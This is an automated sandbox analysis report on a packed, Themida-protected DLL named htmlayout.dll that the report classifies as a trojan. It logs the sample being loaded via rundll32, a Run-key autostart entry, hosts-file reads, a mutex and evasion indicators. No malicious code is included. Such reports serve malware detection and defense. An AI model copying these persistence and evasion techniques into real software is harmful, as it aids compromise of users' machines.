Windows Analysis Report
htmlayout.dll

Source: htmlayout.dll

Static PE information: Number of sections : 15 > 10

Source: htmlayout.dll	Static PE information: Section: ZLIB complexity 0.9982244318181818
Source: htmlayout.dll	Static PE information: Section: ZLIB complexity 0.9926044592696629
Source: htmlayout.dll	Static PE information: Section: ZLIB complexity 1.0107421875
Source: htmlayout.dll	Static PE information: Section: ZLIB complexity 0.9994483540076335

Source: htmlayout.dll

Virustotal: Detection: 42%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\htmlayout.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandler
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElement
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandler
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerEx
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethod
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSS	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElement	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSS	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerEx	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethod	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\128757

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD342.tmp

Source: classification engine

Classification label: mal100.troj.evad.winDLL@27/6@9/6

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\gg24UGs6BG
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6016

Source: rundll32.exe	String found in binary or memory: NATS-SEFI-ADD
Source: rundll32.exe	String found in binary or memory: NATS-DANO-ADD
Source: rundll32.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: rundll32.exe	String found in binary or memory: jp-ocr-b-add
Source: rundll32.exe	String found in binary or memory: jp-ocr-hand-add
Source: rundll32.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: rundll32.exe	String found in binary or memory: ISO_6937-2-add
Source: rundll32.exe	String found in binary or memory: NATS-SEFI-ADD
Source: rundll32.exe	String found in binary or memory: NATS-DANO-ADD
Source: rundll32.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: rundll32.exe	String found in binary or memory: jp-ocr-b-add
Source: rundll32.exe	String found in binary or memory: jp-ocr-hand-add
Source: rundll32.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: rundll32.exe	String found in binary or memory: ISO_6937-2-add

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: htmlayout.dll

Static PE information: More than 208 > 100 exports found

Source: htmlayout.dll

Static file information: File size 20644864 > 1048576

Source: htmlayout.dll	Static PE information: Raw size of is bigger than: 0x100000 < 0x162800
Source: htmlayout.dll	Static PE information: Raw size of is bigger than: 0x100000 < 0x358800
Source: htmlayout.dll	Static PE information: Raw size of .boot is bigger than: 0x100000 < 0xeb3600

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04B7238C push 04B72443h; ret	3_2_04B7243B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485C508 push ecx; mov dword ptr [esp], edx	3_2_0485C509
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047A71C4 push ecx; mov dword ptr [esp], ecx	3_2_047A71C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047C1A9C push ecx; mov dword ptr [esp], eax	3_2_047C1A9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047C4680 push ecx; mov dword ptr [esp], eax	3_2_047C4681
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047A5B64 push ecx; mov dword ptr [esp], ecx	3_2_047A5B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04B7238C push 04B72443h; ret	5_2_04B7243B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485C508 push ecx; mov dword ptr [esp], edx	5_2_0485C509
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_047A71C4 push ecx; mov dword ptr [esp], ecx	5_2_047A71C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_047C1A9C push ecx; mov dword ptr [esp], eax	5_2_047C1A9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_047C4680 push ecx; mov dword ptr [esp], eax	5_2_047C4681
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_047A5B64 push ecx; mov dword ptr [esp], ecx	5_2_047A5B68

Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name:
Source: htmlayout.dll	Static PE information: section name: .themida
Source: htmlayout.dll	Static PE information: section name: .boot

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: initial sample

Static PE information: section name: entropy: 7.905526374226113

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
